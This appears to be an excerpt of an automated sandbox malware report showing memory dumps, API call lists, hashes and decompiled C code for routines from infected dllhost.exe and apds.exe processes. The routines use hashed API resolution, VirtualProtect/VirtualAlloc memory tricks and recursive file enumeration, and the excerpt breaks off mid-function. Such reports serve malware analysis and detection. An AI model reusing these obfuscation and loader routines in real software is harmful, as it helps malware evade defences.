                                                                                • Associated: 0000000E.00000002.2309844660.000000000048F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_480000_dllhost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle
                                                                                • String ID:
                                                                                • API String ID: 3498533004-0
                                                                                • Opcode ID: c20bd1c437b9530f0bb02c29c69b2418bb606a75e88fd4c74d8c7fb95edaa9e5
                                                                                • Instruction ID: 91b46015db81b77ab4dd8a72494ffc2af31abab4b413dd8d95c5915ba38e0e1a
                                                                                • Opcode Fuzzy Hash: c20bd1c437b9530f0bb02c29c69b2418bb606a75e88fd4c74d8c7fb95edaa9e5
                                                                                • Instruction Fuzzy Hash: 6D816C70A083018BD718FF69C85462FB7E5AB94B48F504D2EF685C7390EB78DD058B9A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00470580, Relevance: 3.1, APIs: 2, Instructions: 127memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 646 470580-4705be call 470ed0 649 4705d2-4705da 646->649 650 4705c0-4705cf 646->650 651 4706e7-4706ef 649->651 652 4705e0-4705e3 649->652 652->651 653 4705e9-4705eb 652->653 653->651 654 4705f1-4705fc 653->654 654->651 656 470602-470607 654->656 657 47060d-470629 call 471140 RtlMoveMemory 656->657 658 4706d8-4706e4 656->658 661 470654-470659 657->661 662 47062b-470630 657->662 663 47066c-470678 661->663 664 47065b-47066a 661->664 665 470643-470652 662->665 666 470632-470641 662->666 667 470679-470699 call 471140 663->667 664->667 665->667 666->667 667->651 670 47069b-4706a3 VirtualProtect 667->670 671 4706c6-4706d5 670->671 672 4706a5-4706a8 670->672 672->651 673 4706aa-4706ad 672->673 673->651 674 4706af-4706b1 673->674 674->657 675 4706b7-4706c3 674->675
                                                                                APIs
                                                                                  • Part of subcall function 00470FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00470F08
                                                                                  • Part of subcall function 00470FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00470F3E
                                                                                  • Part of subcall function 00470FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00470F7F
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 0047061B
                                                                                • VirtualProtect.KERNEL32(00000000,-00000018,?,00000000,00000000,00000000,-00000018,00000028,?,?,?,00000000,00000000,?,00000000), ref: 0047069C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309813898.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_470000_dllhost.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 4043890290-0
                                                                                • Opcode ID: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction ID: 3bb7fde04de6c90a23c7e39e1caa62e252e4be300903a6bbbd792a29d0153020
                                                                                • Opcode Fuzzy Hash: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction Fuzzy Hash: D6315AB365520197E324DA39DC55BEFA3C4E7D1354F48883BF90DD2250E52ED498C26E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00485CE0, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 676 485ce0-485cec call 4865e0 679 485d09-485d0d ExitProcess 676->679 680 485cee-485d04 call 483f00 call 483e60 676->680 680->679
                                                                                C-Code - Quality: 100%
                                                                                			_entry_() {
				void* _t5;
				void* _t9;

				E004865E0();
				if( *0x48ddb8 == 0) {
					 *0x48ddb8 = E00483E60(_t5, E00483F00(0x9bab0b12), 0x89f3d704, _t9);
				}
				ExitProcess(0);
			}





                                                                                0x00485ce0
                                                                                0x00485cec
                                                                                0x00485d04
                                                                                0x00485d04
                                                                                0x00485d0b

                                                                                APIs
                                                                                • ExitProcess.KERNELBASE(00000000), ref: 00485D0B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309825739.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2309819379.0000000000480000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309836523.000000000048D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309844660.000000000048F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_480000_dllhost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0
                                                                                • Opcode ID: cfb1c80c00bd24737f87e1ccbe9b050b0aae364ab7001c800185ebf760c0896c
                                                                                • Instruction ID: f575e01ac626e8636f68fbd4961c43953462aceb00a9c6bfda692b75f56a02f5
                                                                                • Opcode Fuzzy Hash: cfb1c80c00bd24737f87e1ccbe9b050b0aae364ab7001c800185ebf760c0896c
                                                                                • Instruction Fuzzy Hash: A0D0C930B0520446DA84BBB6A85572E26DA4FA0B4DF108C2EE511CB2D6FE288910A398
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00470AD0, Relevance: 2.7, APIs: 2, Instructions: 175memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 685 470ad0-470b31 call 470ed0 688 470b47-470b4d 685->688 689 470b33-470b42 685->689 691 470b5f-470b7b 688->691 692 470b4f-470b54 688->692 690 470d40 689->690 694 470b90 691->694 695 470b7d-470b8e 691->695 692->691 696 470b96-470b9c 694->696 695->696 697 470bae-470bca 696->697 698 470b9e-470ba3 696->698 701 470bd7-470c21 VirtualAlloc 697->701 702 470bcc-470bd4 697->702 698->697 706 470c27-470c2e 701->706 707 470d1a-470d24 701->707 702->701 708 470c44-470c4b 706->708 709 470c30-470c3f 706->709 707->690 710 470c5d-470c79 708->710 711 470c4d-470c52 708->711 709->690 713 470c86-470c8d 710->713 714 470c7b-470c83 710->714 711->710 715 470c9f-470cbb 713->715 716 470c8f-470c94 713->716 714->713 718 470cbd-470cc5 715->718 719 470cc8-470cfa VirtualAlloc 715->719 716->715 718->719 722 470d02-470d07 719->722 722->707 723 470d09-470d18 722->723 723->690
                                                                                APIs
                                                                                  • Part of subcall function 00470FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00470F08
                                                                                  • Part of subcall function 00470FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00470F3E
                                                                                  • Part of subcall function 00470FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00470F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000), ref: 00470BFF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309813898.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_470000_dllhost.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 1654584625-0
                                                                                • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction ID: 61f0654b3407d86af71fcb7c400e6dff4a29f6f1c5ce9efbef1062d8683f196a
                                                                                • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction Fuzzy Hash: 2F51F570641218ABDB249B54CE45FEAB7B8EF54701F108096FA0CB7190D6BC6E85CFA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00487080, Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 75%
                                                                                			E00487080(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t9;
				intOrPtr _t17;
				signed int _t28;
				void* _t29;
				WCHAR* _t30;
				void* _t31;

				_t15 = __ebx;
				_t28 = __edx;
				_t30 = E004834C0(__ecx);
				if( *0x48dd1c == 0) {
					 *0x48dd1c = E00483E60(__ebx, E00483F00(0x9bab0b12), 0xe4b28d97, _t31);
				}
				_t6 = LoadLibraryW(_t30);
				_t17 =  *0x48e548; // 0x547e08
				 *(_t17 + 0x30 + _t28 * 4) = _t6;
				_t7 =  *0x48e494;
				if(_t7 == 0) {
					_t7 = E00483E60(_t15, E00483F00(0x9bab0b12), 0x7facde30, _t31);
					 *0x48e494 = _t7;
				}
				_t29 =  *_t7();
				_t9 =  *0x48df30;
				if(_t9 == 0) {
					_t9 = E00483E60(_t15, E00483F00(0x9bab0b12), 0x5010a54d, _t31);
					 *0x48df30 = _t9;
				}
				return  *_t9(_t29, 0, _t30);
			}











                                                                                0x00487080
                                                                                0x00487082
                                                                                0x00487089
                                                                                0x00487092
                                                                                0x004870aa
                                                                                0x004870aa
                                                                                0x004870b0
                                                                                0x004870b2
                                                                                0x004870b8
                                                                                0x004870bc
                                                                                0x004870c3
                                                                                0x004870d6
                                                                                0x004870db
                                                                                0x004870db
                                                                                0x004870e2
                                                                                0x004870e4
                                                                                0x004870eb
                                                                                0x004870fe
                                                                                0x00487103
                                                                                0x00487103
                                                                                0x00487110

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,0048721D,004868AC), ref: 004870B0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309825739.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2309819379.0000000000480000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309836523.000000000048D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309844660.000000000048F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_480000_dllhost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 11a21e2f709940b74ad35f04aac606a26528a9bdffb88a19fc90b1da96b35267
                                                                                • Instruction ID: eb98fcc46bb21d32a7229e2e291240f38f030f83389d01d33332ad85e7d27b7c
                                                                                • Opcode Fuzzy Hash: 11a21e2f709940b74ad35f04aac606a26528a9bdffb88a19fc90b1da96b35267
                                                                                • Instruction Fuzzy Hash: 9C014430B152104BDB14BF7A985162F26EB9FD1E4C7100C3EA619C7355EA38CD02979D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00470170, Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00470FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00470F08
                                                                                  • Part of subcall function 00470FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00470F3E
                                                                                  • Part of subcall function 00470FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00470F7F
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 004702F6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309813898.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_470000_dllhost.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 223123264-0
                                                                                • Opcode ID: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction ID: b0b6fbfab7c40828146e670154dcccf55e76b1669fdb1e67e352ce3e63a77e48
                                                                                • Opcode Fuzzy Hash: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction Fuzzy Hash: 73513AB1901268EBDB20DF64DD84BDEB778EF88704F0045DAE509B7250DB786A85CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 00470010, Relevance: 12.6, Strings: 10, Instructions: 98COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309813898.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_470000_dllhost.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                                                • API String ID: 0-211638553
                                                                                • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction ID: b7c0cfc9fb0e74408b7a8e47b215deed051c86b54330bedff7012c9d6d7ef715
                                                                                • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction Fuzzy Hash: AB313E34E411289BCB04DB98CD80AED7BB5FF4C340B508027E506737A4DB789986CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004706F0, Relevance: 9.2, APIs: 6, Instructions: 169COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309813898.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_470000_dllhost.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction ID: 0d4ddcbb4356184a7c7040a1bf74cc61fce93cb8c4e414ad821f78c6b2c5c23b
                                                                                • Opcode Fuzzy Hash: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction Fuzzy Hash: 22519371A05301DBD720EE3AC840BDBA3D8ABD4794F05852FF94CE6241E239D805879B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004708F0, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309813898.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_470000_dllhost.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction ID: bc2974c1fa270d824156c5a6e30b7dc6bdf995d89e9072708450ed59bc6def44
                                                                                • Opcode Fuzzy Hash: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction Fuzzy Hash: C84104B16153019BC324DE3ACC45AEBB3D9ABD4B54F08C92FF648D6240E278D54887AE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Analysis Process: apds.exe PID: 2336 Parent PID: 2484 apds.exeCOMMON

                                                                                Executed Functions

                                                                                Function 003D0400, Relevance: 21.1, APIs: 14, Instructions: 132memorynativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00401010,00000000,?), ref: 003D0448
                                                                                  • Part of subcall function 003D1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,003D0EFD,00000000), ref: 003D1155
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00401010), ref: 003D0463
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 003D0484
                                                                                • HeapFree.KERNEL32(00000000,00000001,00000000), ref: 003D048D
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 003D0492
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000001,00401010), ref: 003D049F
                                                                                • GetCurrentProcess.KERNEL32(?,00401010,00000000,?), ref: 003D04A6
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00401010,00401010), ref: 003D04B9
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 003D04E0
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 003D04F7
                                                                                • RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 003D0519
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 003D0530
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 003D0547
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 003D0562
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314433116.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3d0000_apds.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 482429597-0
                                                                                • Opcode ID: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction ID: 69eb5499ea1b495a3c6b4292337390fcf8898fdb44a230030d5fcc4ec2977da9
                                                                                • Opcode Fuzzy Hash: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction Fuzzy Hash: EE414DB29043417FE615EBB2D846F6FB3EDAB88B40F408D1EB6449B341DA74D9048B62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E38F0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 447 3e38f0-3e390b 448 3e3910-3e3915 447->448 449 3e391b 448->449 450 3e3a69-3e3a6e 448->450 453 3e3a5f-3e3a64 449->453 454 3e3921-3e3926 449->454 451 3e3acc-3e3adf call 3e34c0 450->451 452 3e3a70-3e3a75 450->452 468 3e3afc-3e3b17 451->468 469 3e3ae1-3e3af7 call 3e3f00 call 3e3e60 451->469 455 3e3ab6-3e3abb 452->455 456 3e3a77-3e3a7e 452->456 453->448 457 3e392c-3e3931 454->457 458 3e3a17-3e3a1e 454->458 455->448 465 3e3ac1-3e3acb 455->465 461 3e3a9b-3e3ab1 456->461 462 3e3a80-3e3a96 call 3e3f00 call 3e3e60 456->462 466 3e3937-3e393c 457->466 467 3e3b70-3e3b77 457->467 463 3e3a3b-3e3a4f FindFirstFileW 458->463 464 3e3a20-3e3a36 call 3e3f00 call 3e3e60 458->464 461->448 462->461 474 3e3b97-3e3ba1 463->474 475 3e3a55-3e3a5a 463->475 464->463 466->455 476 3e3942-3e3947 466->476 472 3e3b79-3e3b8f call 3e3f00 call 3e3e60 467->472 473 3e3b94 467->473 497 3e3b19-3e3b2f call 3e3f00 call 3e3e60 468->497 498 3e3b34-3e3b3f 468->498 469->468 472->473 473->474 475->448 477 3e394d-3e3953 476->477 478 3e39f1-3e3a12 476->478 484 3e3974-3e3976 477->484 485 3e3955-3e395d 477->485 478->448 492 3e396d-3e3972 484->492 494 3e3978-3e398b call 3e34c0 484->494 491 3e395f-3e3963 485->491 485->492 491->484 501 3e3965-3e396b 491->501 492->448 511 3e398d-3e39a3 call 3e3f00 call 3e3e60 494->511 512 3e39a8-3e39ec call 3e38f0 call 3e3460 494->512 497->498 509 3e3b5c-3e3b6b 498->509 510 3e3b41-3e3b57 call 3e3f00 call 3e3e60 498->510 501->484 501->492 509->448 510->509 511->512 512->448
                                                                                C-Code - Quality: 63%
                                                                                			E003E38F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				short _v1588;
				intOrPtr _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				intOrPtr _v1652;
				void* __ebx;
				void* __ebp;
				void* _t22;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t33;
				signed int _t34;
				void* _t39;
				intOrPtr* _t42;
				signed int _t46;
				intOrPtr* _t50;
				intOrPtr _t55;
				void* _t56;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t98;

				_t91 = __ecx;
				_t95 = __edx;
				_v1640 = __ecx;
				_t22 = 0x25a25425;
				_t56 = _v1640;
				while(1) {
					L1:
					_t98 = _t22 - 0x25a25425;
					if(_t98 > 0) {
						break;
					}
					if(_t98 == 0) {
						_t22 = 0x29bc40d3;
						continue;
					} else {
						if(_t22 == 0x8a099c9) {
							if( *0x3ee430 == 0) {
								 *0x3ee430 = E003E3E60(_t56, E003E3F00(0x9bab0b12), 0x83efb111, _t95);
							}
							_t39 = FindFirstFileW( &_v524,  &_v1636); // executed
							_t56 = _t39;
							if(_t56 == 0xffffffff) {
								return _t39;
							} else {
								_t22 = 0x1a4f9837;
								continue;
							}
						} else {
							if(_t22 == 0xb46fa16) {
								_t42 =  *0x3edba4;
								if(_t42 == 0) {
									_t42 = E003E3E60(_t56, E003E3F00(0x9bab0b12), 0xd274268a, _t95);
									 *0x3edba4 = _t42;
								}
								return  *_t42(_t56);
							}
							if(_t22 != 0x1a4f9837) {
								L27:
								if(_t22 != 0x55fa1f4) {
									continue;
								} else {
									return _t22;
								}
							} else {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t46 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t22 = ( ~_t46 & 0x2b8487c8) + 0xb46fa16;
								} else {
									if(_v1636.cFileName != 0x2e) {
										L12:
										if(_t95 == 0) {
											goto L11;
										} else {
											_t94 = E003E34C0(0x3ed290);
											_t50 =  *0x3ee158;
											if(_t50 == 0) {
												_t50 = E003E3E60(_t56, E003E3F00(0xc6fbcd74), 0xba71dd03, _t95);
												 *0x3ee158 = _t50;
											}
											 *_t50( &_v1044, 0x104, _t94, _t91,  &(_v1636.cFileName));
											E003E38F0( &_v1044, _t95, _a4, _a8);
											_t96 = _t96 + 0x1c;
											E003E3460(_t94);
											_t22 = 0x36cb81de;
										}
									} else {
										_t55 = _v1590;
										if(_t55 == 0 || _t55 == 0x2e && _v1588 == 0) {
											L11:
											_t22 = 0x36cb81de;
										} else {
											goto L12;
										}
									}
								}
								continue;
							}
						}
					}
					L40:
				}
				if(_t22 == 0x29bc40d3) {
					_t93 = E003E34C0(0x3ed260);
					_t24 =  *0x3ee158;
					if(_t24 == 0) {
						_t24 = E003E3E60(_t56, E003E3F00(0xc6fbcd74), 0xba71dd03, _t95);
						 *0x3ee158 = _t24;
					}
					 *_t24( &_v524, 0x104, _t93, _t91);
					_t26 =  *0x3ee494;
					_t96 = _t96 + 0x10;
					if(_t26 == 0) {
						_t26 = E003E3E60(_t56, E003E3F00(0x9bab0b12), 0x7facde30, _t95);
						 *0x3ee494 = _t26;
					}
					_t92 =  *_t26();
					_t28 =  *0x3edf30;
					if(_t28 == 0) {
						_t28 = E003E3E60(_t56, E003E3F00(0x9bab0b12), 0x5010a54d, _t95);
						 *0x3edf30 = _t28;
					}
					 *_t28(_t92, 0, _t93);
					_t91 = _v1652;
					_t22 = 0x8a099c9;
					goto L1;
				} else {
					if(_t22 != 0x36cb81de) {
						goto L27;
					} else {
						_t33 =  *0x3edf88;
						if(_t33 == 0) {
							_t33 = E003E3E60(_t56, E003E3F00(0x9bab0b12), 0xa53a5b1a, _t95);
							 *0x3edf88 = _t33;
						}
						_t34 =  *_t33(_t56,  &_v1636);
						asm("sbb eax, eax");
						_t22 = ( ~_t34 & 0x0f089e21) + 0xb46fa16;
						goto L1;
					}
				}
				goto L40;
			}































                                                                                0x003e38fa
                                                                                0x003e38fc
                                                                                0x003e38fe
                                                                                0x003e3902
                                                                                0x003e3907
                                                                                0x003e3910
                                                                                0x003e3910
                                                                                0x003e3910
                                                                                0x003e3915
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e391b
                                                                                0x003e3a5f
                                                                                0x00000000
                                                                                0x003e3921
                                                                                0x003e3926
                                                                                0x003e3a1e
                                                                                0x003e3a36
                                                                                0x003e3a36
                                                                                0x003e3a48
                                                                                0x003e3a4a
                                                                                0x003e3a4f
                                                                                0x003e3ba1
                                                                                0x003e3a55
                                                                                0x003e3a55
                                                                                0x00000000
                                                                                0x003e3a55
                                                                                0x003e392c
                                                                                0x003e3931
                                                                                0x003e3b70
                                                                                0x003e3b77
                                                                                0x003e3b8a
                                                                                0x003e3b8f
                                                                                0x003e3b8f
                                                                                0x00000000
                                                                                0x003e3b95
                                                                                0x003e393c
                                                                                0x003e3ab6
                                                                                0x003e3abb
                                                                                0x00000000
                                                                                0x003e3acb
                                                                                0x003e3acb
                                                                                0x003e3acb
                                                                                0x003e3942
                                                                                0x003e3947
                                                                                0x003e39fd
                                                                                0x003e3a06
                                                                                0x003e3a0d
                                                                                0x003e394d
                                                                                0x003e3953
                                                                                0x003e3974
                                                                                0x003e3976
                                                                                0x00000000
                                                                                0x003e3978
                                                                                0x003e3982
                                                                                0x003e3984
                                                                                0x003e398b
                                                                                0x003e399e
                                                                                0x003e39a3
                                                                                0x003e39a3
                                                                                0x003e39bc
                                                                                0x003e39d8
                                                                                0x003e39dd
                                                                                0x003e39e2
                                                                                0x003e39e7
                                                                                0x003e39e7
                                                                                0x003e3955
                                                                                0x003e3955
                                                                                0x003e395d
                                                                                0x003e396d
                                                                                0x003e396d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e395d
                                                                                0x003e3953
                                                                                0x00000000
                                                                                0x003e3947
                                                                                0x003e393c
                                                                                0x003e3926
                                                                                0x00000000
                                                                                0x003e391b
                                                                                0x003e3a6e
                                                                                0x003e3ad6
                                                                                0x003e3ad8
                                                                                0x003e3adf
                                                                                0x003e3af2
                                                                                0x003e3af7
                                                                                0x003e3af7
                                                                                0x003e3b0b
                                                                                0x003e3b0d
                                                                                0x003e3b12
                                                                                0x003e3b17
                                                                                0x003e3b2a
                                                                                0x003e3b2f
                                                                                0x003e3b2f
                                                                                0x003e3b36
                                                                                0x003e3b38
                                                                                0x003e3b3f
                                                                                0x003e3b52
                                                                                0x003e3b57
                                                                                0x003e3b57
                                                                                0x003e3b60
                                                                                0x003e3b62
                                                                                0x003e3b66
                                                                                0x00000000
                                                                                0x003e3a70
                                                                                0x003e3a75
                                                                                0x00000000
                                                                                0x003e3a77
                                                                                0x003e3a77
                                                                                0x003e3a7e
                                                                                0x003e3a91
                                                                                0x003e3a96
                                                                                0x003e3a96
                                                                                0x003e3aa1
                                                                                0x003e3aa5
                                                                                0x003e3aac
                                                                                0x00000000
                                                                                0x003e3aac
                                                                                0x003e3a75
                                                                                0x00000000

                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 003E3A48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2314443678.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000F.00000002.2314437691.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314450855.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000F.00000002.2314456602.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_3e0000_apds.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID: .
                                                                                • API String ID: 1974802433-248832578
                                                                                • Opcode ID: 59dda3ab98b407d8618fcc53b3a7d06847a9f36683dd29bcd4ad2946dd87d394
                                                                                • Instruction ID: ebad58ed1d4e53fb205c4c3d4125e58790bbc3cb2dbff0001b831096572d3aaf
                                                                                • Opcode Fuzzy Hash: 59dda3ab98b407d8618fcc53b3a7d06847a9f36683dd29bcd4ad2946dd87d394
                                                                                • Instruction Fuzzy Hash: D05103316042E54BCA36AB6A988D77B36AA9BD0700F010B29F456CF3D2EB75CF454792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E5040, Relevance: 1.7, APIs: 1, Instructions: 248memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 61%
                                                                                			E003E5040(intOrPtr __ecx, intOrPtr __edx) {
				char _v4;
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				void* _v36;
				intOrPtr _v44;
				signed int _v52;
				void* _v68;
				void* __ebx;
				void* __ebp;
				void* _t16;
				void* _t17;
				void* _t23;
				void* _t26;
				void* _t29;
				void* _t31;
				void* _t35;
				void* _t37;
				void* _t41;
				void* _t42;
				void* _t45;
				void* _t50;
